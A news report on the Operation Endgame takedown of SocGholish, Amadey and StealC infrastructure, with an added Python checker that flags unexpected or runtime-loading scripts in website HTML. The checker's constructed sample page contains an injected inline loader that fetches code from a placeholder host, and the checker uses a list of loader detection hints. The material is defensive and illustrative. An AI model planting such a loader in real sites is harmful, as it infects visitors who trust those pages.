A coordinated international law enforcement and private-sector operation has dismantled major parts of the infrastructure behind the SocGholish, Amadey, and StealC malware families, seizing more than €41 million ($47 million) in cryptocurrency and disrupting hundreds of servers that supported ransomware, credential theft, and financial fraud campaigns.
The action, announced today by Europol, is part of Operation Endgame, an ongoing multinational effort targeting malware services that provide initial access for ransomware gangs and other cybercriminals. The operation involved authorities from Canada, Denmark, Germany, the Netherlands, the UK, and the US, working alongside Microsoft and several cybersecurity firms.
According to Europol, authorities and industry partners took action against 326 servers and 142 domains, and recovered roughly 27 million stolen credentials. The operation focused on malware commonly sold through “cybercrime-as-a-service” schemes, in which affiliates rent tools to infect systems and steal data, then pass access to other criminals for ransomware deployment or fraud.
Microsoft said it identified and moved to disrupt more than 200 command-and-control domains and IP addresses linked to the Amadey loader and StealC infostealer networks. The company worked with Europol and industry partners to seize, suspend, block, or otherwise disable the infrastructure supporting the malware operations.
Amadey and StealC play complementary roles in the cybercrime ecosystem. Amadey, active since 2018, is a malware loader used to gain an initial foothold on victim systems and deploy additional payloads. StealC is an information-stealing malware service that harvests browser credentials, cookies, cryptocurrency wallet data, email account information, and other sensitive data from infected devices. Microsoft noted that stolen credentials collected by infostealers frequently become the entry point for ransomware attacks and account compromise campaigns.

Europol said the operation also targeted SocGholish, also known as FakeUpdates, a malware loader linked to the Russian cybercrime group Evil Corp. Investigators remediated 14,971 compromised websites that had been distributing fake browser update prompts to visitors. The infected sites, many of them small businesses such as restaurants and auto repair shops, were used to trick users into installing malware that granted attackers remote access to their systems.
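The compromised-website pattern described above leaves a visible footprint in the page itself: a script tag pointing at a host the site owner never added, or an inline snippet that builds a script element at runtime to pull the lure. The following check is an added example for operators of small sites, not code from the article or from Europol, Microsoft or ESET. The sample page, the allowlist and the `.invalid` placeholder hostnames are constructed for illustration and are not SocGholish indicators; the inline-script hints are a generic heuristic, not a signature for any specific malware.

```python
"""Flag script sources outside an allowlist and inline scripts that load code at runtime.

Added example. SAMPLE_PAGE, the page host and the allowlist are constructed;
the '.invalid' hostnames are placeholders, not real indicators.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline-script fragments worth a second look: injected loaders commonly
# create a <script> element at runtime or unpack an obfuscated payload.
INLINE_HINTS = ('createElement("script")', "createElement('script')", "eval(", "atob(")


class ScriptCollector(HTMLParser):
    """Collect external script sources and the bodies of inline scripts."""

    def __init__(self):
        super().__init__()
        self.sources = []        # value of every <script src=...>
        self.inline_bodies = []  # text of every <script> without src
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.sources.append(src)
        else:
            self._in_inline = True
            self._buf = []

    def handle_data(self, data):
        # html.parser delivers <script> content via handle_data (CDATA mode)
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_inline:
            self.inline_bodies.append("".join(self._buf))
            self._in_inline = False


def audit_scripts(html, page_host, allowed_hosts=()):
    """Return script sources not served by page_host or an allowlisted host,
    plus inline scripts that match INLINE_HINTS.

    Relative paths (/js/app.js) are treated as first-party. Protocol-relative
    URLs (//cdn.example/x.js) are given a scheme so urlparse yields the host.
    """
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    trusted = {page_host.lower()} | {h.lower() for h in allowed_hosts}

    unexpected = []
    for src in parser.sources:
        candidate = "https:" + src if src.startswith("//") else src
        host = urlparse(candidate).hostname
        if host is None:
            continue  # relative path, served by the page's own host
        if host.lower() not in trusted:
            unexpected.append(src)

    suspicious_inline = [
        body.strip() for body in parser.inline_bodies
        if any(hint in body for hint in INLINE_HINTS)
    ]
    return {"unexpected_sources": unexpected, "suspicious_inline": suspicious_inline}


# Constructed sample: a small-business page with one first-party script, one
# allowlisted CDN script, one injected external script and one injected
# inline loader. The hostnames under .invalid are placeholders.
SAMPLE_PAGE = """<!doctype html>
<html><head><title>Joe's Auto Repair</title>
<script src="/js/site.js"></script>
<script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script>
<script src="//static.injected-placeholder.invalid/update.js"></script>
<script>var s=document.createElement("script");s.src="https://injected-placeholder.invalid/l.js";document.head.appendChild(s);</script>
</head><body><p>Hours: 8-5</p>
<script>console.log("analytics ok");</script>
</body></html>"""

if __name__ == "__main__":
    report = audit_scripts(SAMPLE_PAGE, "joes-auto.example", ("cdn.jsdelivr.net",))
    for src in report["unexpected_sources"]:
        print("unexpected script source:", src)
    for body in report["suspicious_inline"]:
        print("suspicious inline script:", body[:80])
```

Run it against the HTML your server actually sends to an anonymous visitor, not a copy from your CMS: injected code is often served conditionally, so fetch the page as a first-time visitor with a common browser User-Agent and compare the result against a known-good copy of each template.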
Research published by ESET reveals the scale of the disrupted infrastructure. The company, which participated in the operation, said the takedown affected approximately 50 domains and nearly 200 active command-and-control servers used by Amadey and StealC affiliates. ESET researchers identified 53 distinct Amadey affiliate clusters and 73 separate StealC clusters, highlighting how both malware families rely on decentralized infrastructure operated by individual customers rather than a shared backend.
The security vendor also reported that telemetry collected during the first half of 2026 showed Amadey and StealC being distributed globally through fake software updates, trojanized installers, phishing campaigns, and other malware loaders. Microsoft estimated that the two malware families were linked to more than 140,000 infected computers worldwide during the first two weeks of May alone.

The operation reflects a shift in law enforcement strategy: rather than targeting a single malware strain, investigators focused on disrupting the entire criminal supply chain used to deliver ransomware and steal credentials at scale. By simultaneously targeting loaders, infostealers, command-and-control infrastructure, and stolen data, authorities hope to make it significantly more difficult for cybercriminals to rebuild their operations.
Users are advised to ignore update prompts displayed by websites and update browsers only through the browser's own update mechanism, install software only from trusted sources, enable multi-factor authentication, keep systems up to date, and immediately change passwords (and revoke active sessions where possible) if they suspect their credentials may have been exposed.